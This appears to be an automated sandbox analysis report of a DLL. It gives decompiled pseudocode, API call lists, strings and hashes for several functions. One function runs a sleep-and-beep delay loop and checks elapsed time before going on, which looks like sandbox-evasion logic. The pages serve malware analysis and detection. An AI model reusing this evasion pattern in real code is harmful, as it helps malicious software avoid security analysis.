Uniqueness Score: -1.00%

Function 6E9E5D90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 193
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E6E9E5D90(void* __eflags) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				CHAR* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _t86;

				_v5 = 0;
				_t86 = E6E9E2640(L"KERNEL32.dll", 0); // executed
				_v24 = _t86;
				_v20 = E6E9E3C50(E6E9E4F10( &_v5));
				_v28 = _v24(_v20);
				if(_v28 == 0) {
					_v6 = 0;
					_v36 = E6E9E2430(L"KERNEL32.dll", 0);
					_v32 = E6E9E3BF0(E6E9E3DF0( &_v6));
					_v36(_v32);
				}
				_v7 = 0;
				_v44 = E6E9E2640(L"KERNEL32.dll", 0);
				_v40 = E6E9E3C90(E6E9E4120( &_v7));
				_v48 = _v44(_v40);
				if(_v48 == 0) {
					_v8 = 0;
					_v56 = E6E9E2430(L"KERNEL32.dll", 0);
					_v52 = E6E9E3CD0(E6E9E5090( &_v8));
					LoadLibraryA(_v52);
				}
				_v9 = 0;
				_v64 = E6E9E2640(L"KERNEL32.dll", 0);
				_v60 = E6E9E3B10(E6E9E4E00( &_v9));
				_v68 = _v64(_v60);
				if(_v68 == 0) {
					_v10 = 0;
					_v76 = E6E9E2430(L"KERNEL32.dll", 0);
					_v72 = E6E9E3B30(E6E9E43F0( &_v10));
					LoadLibraryA(_v72);
				}
				_v11 = 0;
				_v84 = E6E9E2640(L"KERNEL32.dll", 0);
				_v80 = E6E9E3BD0(E6E9E4F90( &_v11));
				_v88 = _v84(_v80);
				if(_v88 == 0) {
					_v12 = 0;
					_v96 = E6E9E2430(L"KERNEL32.dll", 0);
					_v92 = E6E9E3C10(E6E9E4A40( &_v12));
					LoadLibraryA(_v92);
				}
				_v13 = 0;
				_v104 = E6E9E2640(L"KERNEL32.dll", 0);
				_v100 = E6E9E3BB0(E6E9E5010( &_v13));
				_v108 = _v104(_v100);
				if(_v108 == 0) {
					_v14 = 0;
					_v116 = E6E9E2430(L"KERNEL32.dll", 0);
					_v112 = E6E9E3C30(E6E9E4AC0( &_v14));
					_v116(_v112);
				}
				_v15 = 0;
				_v124 = E6E9E2640(L"KERNEL32.dll", 0);
				_v120 = E6E9E3B70(E6E9E4510( &_v15));
				_v128 = _v124(_v120);
				if(_v128 == 0) {
					_v16 = 0;
					_v136 = E6E9E2430(L"Kernel32.dll", 0);
					_v132 = E6E9E3B90(E6E9E5200( &_v16));
					_v136(_v132);
				}
				return 1;
			}

0x6e9e5d9b
0x6e9e5da5
0x6e9e5daa
0x6e9e5dbc
0x6e9e5dc6
0x6e9e5dcd
0x6e9e5dd1
0x6e9e5de0
0x6e9e5df2
0x6e9e5df9
0x6e9e5df9
0x6e9e5dfe
0x6e9e5e0d
0x6e9e5e1f
0x6e9e5e29
0x6e9e5e30
0x6e9e5e34
0x6e9e5e43
0x6e9e5e55
0x6e9e5e5c
0x6e9e5e5c
0x6e9e5e61
0x6e9e5e70
0x6e9e5e82
0x6e9e5e8c
0x6e9e5e93
0x6e9e5e97
0x6e9e5ea6
0x6e9e5eb8
0x6e9e5ebf
0x6e9e5ebf
0x6e9e5ec4
0x6e9e5ed3
0x6e9e5ee5
0x6e9e5eef
0x6e9e5ef6
0x6e9e5efa
0x6e9e5f09
0x6e9e5f1b
0x6e9e5f22
0x6e9e5f22
0x6e9e5f27
0x6e9e5f36
0x6e9e5f48
0x6e9e5f52
0x6e9e5f59
0x6e9e5f5d
0x6e9e5f6c
0x6e9e5f7e
0x6e9e5f85
0x6e9e5f85
0x6e9e5f8a
0x6e9e5f99
0x6e9e5fab
0x6e9e5fb5
0x6e9e5fbc
0x6e9e5fc0
0x6e9e5fcf
0x6e9e5fe4
0x6e9e5feb
0x6e9e5feb
0x6e9e5ff6

APIs

LoadLibraryA.KERNELBASE(?,KERNEL32.dll,00000000), ref: 6E9E5E5C
LoadLibraryA.KERNELBASE(?,KERNEL32.dll,00000000), ref: 6E9E5EBF
LoadLibraryA.KERNELBASE(?,KERNEL32.dll,00000000), ref: 6E9E5F22

Strings

KERNEL32.dll, xrefs: 6E9E5DA0, 6E9E5DD6, 6E9E5E03, 6E9E5E39, 6E9E5E66, 6E9E5E9C, 6E9E5EC9, 6E9E5EFF, 6E9E5F2C, 6E9E5F62, 6E9E5F8F
Kernel32.dll, xrefs: 6E9E5FC5

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: LibraryLoad
String ID: KERNEL32.dll$Kernel32.dll
API String ID: 1029625771-1263921953
Opcode ID: 4edd07bc127837bec01181b1ab28adb51a2fd32cf83698b2af3a33ecfc523779
Instruction ID: 8105315d30b957639c3be7d2cd2125e0437ef643159d445c93c94be8bed1942e
Opcode Fuzzy Hash: 4edd07bc127837bec01181b1ab28adb51a2fd32cf83698b2af3a33ecfc523779
Instruction Fuzzy Hash: 47711C70E00218EFCF06DBF4C8587DEBBB5AF94304F104969E606AB654EFB49A418F50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E94AD Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E6E9E94AD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x6e9fa618);
				E6E9E9960(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6E9E95B8( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6E9E92A3(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_push(_t42);
						_push( *((intOrPtr*)(_t47 + 8)));
						_t26 = E6E9E9A40();
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_push(_t26);
								_push( *((intOrPtr*)(_t47 + 8)));
								_t29 = E6E9E9A40();
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6E9E93FD(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6E9E95B8( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6E9E92A3(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6E9E95B8( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6e9fcfec - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6e9e94ad
0x6e9e94ad
0x6e9e94af
0x6e9e94b4
0x6e9e94b9
0x6e9e94be
0x6e9e94cf
0x6e9e94cf
0x6e9e94d3
0x6e9e94d6
0x6e9e94e2
0x6e9e94e2
0x6e9e94ef
0x6e9e94f1
0x6e9e94f4
0x6e9e94f6
0x6e9e959f
0x6e9e959f
0x6e9e95a6
0x6e9e95a8
0x6e9e95ab
0x6e9e95b7
0x6e9e95b7
0x6e9e9501
0x6e9e9506
0x6e9e9508
0x6e9e950b
0x6e9e950d
0x00000000
0x00000000
0x6e9e9513
0x6e9e9513
0x6e9e9514
0x6e9e9515
0x6e9e9518
0x6e9e951d
0x6e9e951f
0x6e9e9522
0x6e9e9525
0x6e9e9527
0x6e9e9529
0x6e9e952b
0x6e9e952c
0x6e9e952d
0x6e9e9530
0x6e9e9535
0x6e9e9537
0x6e9e9537
0x6e9e953d
0x6e9e953e
0x6e9e9543
0x6e9e9549
0x6e9e9549
0x6e9e9529
0x6e9e954e
0x6e9e9550
0x6e9e9557
0x6e9e9561
0x6e9e9563
0x6e9e9566
0x6e9e9568
0x6e9e9574
0x6e9e959c
0x6e9e959c
0x00000000
0x6e9e9552
0x6e9e9552
0x6e9e9555
0x00000000
0x00000000
0x00000000
0x6e9e9555
0x6e9e9550
0x6e9e94d8
0x6e9e94db
0x00000000
0x00000000
0x6e9e94dd
0x00000000
0x6e9e94dd
0x6e9e94c0
0x6e9e94c6
0x00000000
0x00000000
0x6e9e94c8
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6E9E94EA
dllmain_crt_dispatch.LIBCMT ref: 6E9E9501
dllmain_raw.LIBCMT ref: 6E9E9549
dllmain_crt_dispatch.LIBCMT ref: 6E9E955C
dllmain_raw.LIBCMT ref: 6E9E956F

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: f3bdd62b9eaf44bc6e5136fd12c9be93b17f52c126be5672da99562bac2fed98
Instruction ID: 01b17f800f3c0edc663631ca35febe808a74f3f7f1fe833cd5ba9e9c74a318d0
Opcode Fuzzy Hash: f3bdd62b9eaf44bc6e5136fd12c9be93b17f52c126be5672da99562bac2fed98
Instruction Fuzzy Hash: 8F219172D04625AFDB634FD9CC40AAE3A6DEF85A94F014495FE286B610DB30CD418FD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E8A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E6E9E8A90(void* __ecx, void* __eflags) {
				char _v5;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v304;
				signed char _t32;
				char _t46;
				char _t47;

				_v20 = 0;
				_v16 = 0;
				_v24 = 0;
				_v12 = 0;
				_v28 = 0xa;
				_t32 = E6E9E5D90(__eflags); // executed
				if((_t32 & 0x000000ff) == 0) {
					L15:
					__eflags = 0;
					return 0;
				} else {
					_v5 = 0;
					_v36 = E6E9E26D0(L"Kernel32.dll", 0);
					_v32 = E6E9E3D10(E6E9E4E80( &_v5));
					_v36(_v32,  &_v304, 0x100);
					_v20 =  *((intOrPtr*)(E6E9E2220(L"Kernel32.dll", 0)))();
					L2:
					if(_v12 < _v28) {
						_v40 = E6E9E22E0(L"Kernel32.dll", 0);
						Sleep(0x1770);
						_v44 = E6E9E2580(L"Kernel32.dll", 0);
						Beep(0, 0xbb8);
						_v12 = _v12 + 1;
						goto L2;
					}
					_v16 =  *((intOrPtr*)(E6E9E2220(L"Kernel32.dll", 0)))();
					_v24 = _v16 - _v20;
					__eflags = _v24 - 0xd6d8;
					if(_v24 < 0xd6d8) {
						goto L15;
					}
					__eflags = _v12 - _v28;
					if(__eflags < 0) {
						goto L15;
					}
					_t46 = E6E9E7700(__eflags);
					__eflags = _t46;
					if(_t46 == 0) {
						return 1;
					}
					_t47 = E6E9E69A0( &_v304);
					__eflags = _t47;
					if(_t47 != 0) {
						__eflags = E6E9E7670();
						if(__eflags == 0) {
							_v48 = E6E9E7770();
							__eflags = _v48 - 1;
							if(_v48 == 1) {
								__eflags = E6E9E71E0();
								if(__eflags == 0) {
									E6E9E6390(__eflags);
								} else {
									E6E9E6390(__eflags);
								}
							}
						} else {
							E6E9E6390(__eflags);
						}
					}
					goto L15;
				}
			}

0x6e9e8a99
0x6e9e8aa0
0x6e9e8aa7
0x6e9e8aae
0x6e9e8ab5
0x6e9e8abc
0x6e9e8ac6
0x6e9e8bd9
0x6e9e8bd9
0x00000000
0x6e9e8acc
0x6e9e8ace
0x6e9e8add
0x6e9e8aef
0x6e9e8b02
0x6e9e8b13
0x6e9e8b16
0x6e9e8b1c
0x6e9e8b2a
0x6e9e8b32
0x6e9e8b41
0x6e9e8b4b
0x6e9e8b54
0x00000000
0x6e9e8b54
0x6e9e8b67
0x6e9e8b70
0x6e9e8b73
0x6e9e8b7a
0x00000000
0x00000000
0x6e9e8b7f
0x6e9e8b82
0x00000000
0x00000000
0x6e9e8b84
0x6e9e8b89
0x6e9e8b8b
0x00000000
0x6e9e8b8d
0x6e9e8b9d
0x6e9e8ba2
0x6e9e8ba4
0x6e9e8bab
0x6e9e8bad
0x6e9e8bbb
0x6e9e8bbe
0x6e9e8bc2
0x6e9e8bc9
0x6e9e8bcb
0x6e9e8bd4
0x6e9e8bcd
0x6e9e8bcd
0x6e9e8bcd
0x6e9e8bcb
0x6e9e8baf
0x6e9e8baf
0x6e9e8baf
0x6e9e8bad
0x00000000
0x6e9e8ba4

APIs

Part of subcall function 6E9E5D90: LoadLibraryA.KERNELBASE(?,KERNEL32.dll,00000000), ref: 6E9E5E5C
Part of subcall function 6E9E5D90: LoadLibraryA.KERNELBASE(?,KERNEL32.dll,00000000), ref: 6E9E5EBF

Sleep.KERNELBASE(00001770,Kernel32.dll,00000000), ref: 6E9E8B32
Beep.KERNELBASE(00000000,00000BB8,Kernel32.dll,00000000), ref: 6E9E8B4B

Strings

Kernel32.dll, xrefs: 6E9E8AD3, 6E9E8B07, 6E9E8B20, 6E9E8B37, 6E9E8B5B

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: LibraryLoad$BeepSleep
String ID: Kernel32.dll
API String ID: 3219767812-1926710522
Opcode ID: 5a13ffeb5defdf187dbede32d991adb7b22ec1dfbfcd9fc0f6d13bea4b11fe66
Instruction ID: 8439258208e2c259ae3c2b9a80d3380c32cb641b0ee43e44f740df168dc1d195
Opcode Fuzzy Hash: 5a13ffeb5defdf187dbede32d991adb7b22ec1dfbfcd9fc0f6d13bea4b11fe66
Instruction Fuzzy Hash: 55313070D0030AEAEB56DBF498447EEB7B8AF95304F184859D711BBA80DBB5D540CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EFD93 Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6E9EFD93(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E6E9EFD5C(_t26) - _t26 >> 1;
					_t7 = E6E9EFCA5(0, 0, _t26, E6E9EFD5C(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E6E9EE649(_t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E6E9EFCA5(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E6E9EDC0E(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

0x6e9efda2
0x6e9efda8
0x6e9efe03
0x6e9efe03
0x6e9efdaa
0x6e9efdb8
0x6e9efdbe
0x6e9efdc6
0x6e9efdcb
0x00000000
0x6e9efdcd
0x6e9efdce
0x6e9efdd3
0x6e9efdd8
0x6e9efdf8
0x6e9efdf2
0x6e9efdf2
0x6e9efdf4
0x6e9efdf4
0x6e9efdfb
0x6e9efe00
0x6e9efdcb
0x6e9efe07
0x6e9efe0a
0x6e9efe0a
0x6e9efe16

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6E9EFD9C
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E9EFE0A

Part of subcall function 6E9EFCA5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6E9EE286,6E9F12A9,0000FDE9,00000000,?,?,?,6E9F1022,0000FDE9,00000000,?), ref: 6E9EFD51

Part of subcall function 6E9EE649: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,6E9F0272,?,00000000,?,6E9ED4C9,?,00000004,?,?,?,?,6E9ECFC7), ref: 6E9EE67B

_free.LIBCMT ref: 6E9EFDFB

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 8391dc935622efd2f2f59dd42074591c88b9fd3fca9ca7dbfcc7681c7ac3fbe9
Instruction ID: fe0c55f7035861f5e88ad312d37c6f53e450876466dbc16d498fd922d493e173
Opcode Fuzzy Hash: 8391dc935622efd2f2f59dd42074591c88b9fd3fca9ca7dbfcc7681c7ac3fbe9
Instruction Fuzzy Hash: D601D4A3601A127F771315FB7C88CBB2D6DDEC29AC334092ABB15D6641EB50DE0189B0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E92F6 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E6E9E92F6(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6E9E9960(__ebx, __edi, __esi);
				_t43 = E6E9E8F8C(__ecx, __edx, 0); // executed
				_t90 = 0x6e9fa5d0;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6E9E8E91();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6e9fcfc8;
					if( *0x6e9fcfc8 != 0) {
						E6E9E9839(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6e9fa5f0);
						E6E9E9960(1, __edi, __esi);
						_t48 =  *0x6e9fcfec; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6e9fcfec = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6E9E8E91();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6e9fcfc8 - 2;
							if( *0x6e9fcfc8 != 2) {
								E6E9E9839(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6e9fa618);
								E6E9E9960(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6E9E95B8( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6E9E92A3(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_push(_t110);
											_push( *((intOrPtr*)(_t123 + 8)));
											_t56 = E6E9E9A40();
											_t115 = _t56;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_push(_t56);
													_push( *((intOrPtr*)(_t123 + 8)));
													_t59 = E6E9E9A40();
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6E9E95B8( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6E9E92A3(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6E9E95B8( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6e9fcfec - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6E9E8F5C(1, _t90, 1, _t113);
								E6E9E9A52();
								E6E9E9AB3();
								 *0x6e9fcfc8 =  *0x6e9fcfc8 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6E9E9492();
								_t67 = E6E9E90FE( *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6E9E949F();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6e9fcfc8 = 1;
						if(E6E9E8EEE(_t132) != 0) {
							E6E9E9A46(E6E9E9A87());
							E6E9E9A64();
							_t80 = E6E9ED38A(0x6e9f51fc, 0x6e9f520c);
							_pop(_t102);
							if(_t80 == 0 && E6E9E8EC3(1, _t102) != 0) {
								E6E9ED345(_t102, 0x6e9f51bc, 0x6e9f51f8);
								 *0x6e9fcfc8 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6E9E93D9();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6E9E9A81();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6E9E904D(_t85, _t106, _t121, _t138) != 0) {
									 *0x6e9f51b8( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6e9fcfec =  *0x6e9fcfec + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}

0x6e9e92f6
0x6e9e92f6
0x6e9e92f6
0x6e9e92f6
0x6e9e92fd
0x6e9e9304
0x6e9e9309
0x6e9e930c
0x6e9e93e3
0x6e9e93e3
0x6e9e93e3
0x00000000
0x6e9e9312
0x6e9e9317
0x6e9e931a
0x6e9e931c
0x6e9e931f
0x6e9e9323
0x6e9e932a
0x6e9e93f7
0x6e9e93fc
0x6e9e93fd
0x6e9e93ff
0x6e9e9404
0x6e9e9409
0x6e9e940e
0x6e9e9410
0x6e9e9417
0x6e9e941f
0x6e9e9422
0x6e9e942b
0x6e9e942e
0x6e9e9431
0x6e9e9438
0x6e9e94a7
0x6e9e94ac
0x6e9e94ad
0x6e9e94af
0x6e9e94b4
0x6e9e94b9
0x6e9e94bc
0x6e9e94be
0x6e9e94cf
0x6e9e94cf
0x6e9e94d3
0x6e9e94d6
0x6e9e94e2
0x6e9e94e2
0x6e9e94ef
0x6e9e94f1
0x6e9e94f4
0x6e9e94f6
0x6e9e9501
0x6e9e9506
0x6e9e9508
0x6e9e950b
0x6e9e950d
0x00000000
0x00000000
0x6e9e950d
0x6e9e94d8
0x6e9e94d8
0x6e9e94db
0x00000000
0x6e9e94dd
0x6e9e94dd
0x6e9e9513
0x6e9e9513
0x6e9e9514
0x6e9e9515
0x6e9e9518
0x6e9e951d
0x6e9e951f
0x6e9e9522
0x6e9e9525
0x6e9e9527
0x6e9e9529
0x6e9e952b
0x6e9e952c
0x6e9e952d
0x6e9e9530
0x6e9e9535
0x6e9e9537
0x6e9e9537
0x6e9e953d
0x6e9e953e
0x6e9e9543
0x6e9e9549
0x6e9e9549
0x6e9e9529
0x6e9e954e
0x6e9e9550
0x6e9e9557
0x6e9e9561
0x6e9e9563
0x6e9e9566
0x6e9e9568
0x6e9e9574
0x6e9e959c
0x6e9e959c
0x6e9e9552
0x6e9e9552
0x6e9e9555
0x00000000
0x00000000
0x6e9e9555
0x6e9e9550
0x6e9e94db
0x6e9e959f
0x6e9e95a6
0x6e9e94c0
0x6e9e94c0
0x6e9e94c6
0x00000000
0x6e9e94c8
0x6e9e94c8
0x6e9e94c8
0x6e9e94c6
0x6e9e95ab
0x6e9e95b7
0x6e9e943a
0x6e9e943a
0x6e9e943f
0x6e9e9444
0x6e9e9449
0x6e9e9450
0x6e9e9454
0x6e9e945e
0x6e9e946a
0x6e9e946c
0x6e9e946c
0x6e9e946e
0x6e9e9471
0x6e9e9478
0x6e9e947d
0x00000000
0x6e9e947d
0x6e9e9412
0x6e9e9412
0x6e9e947f
0x6e9e9482
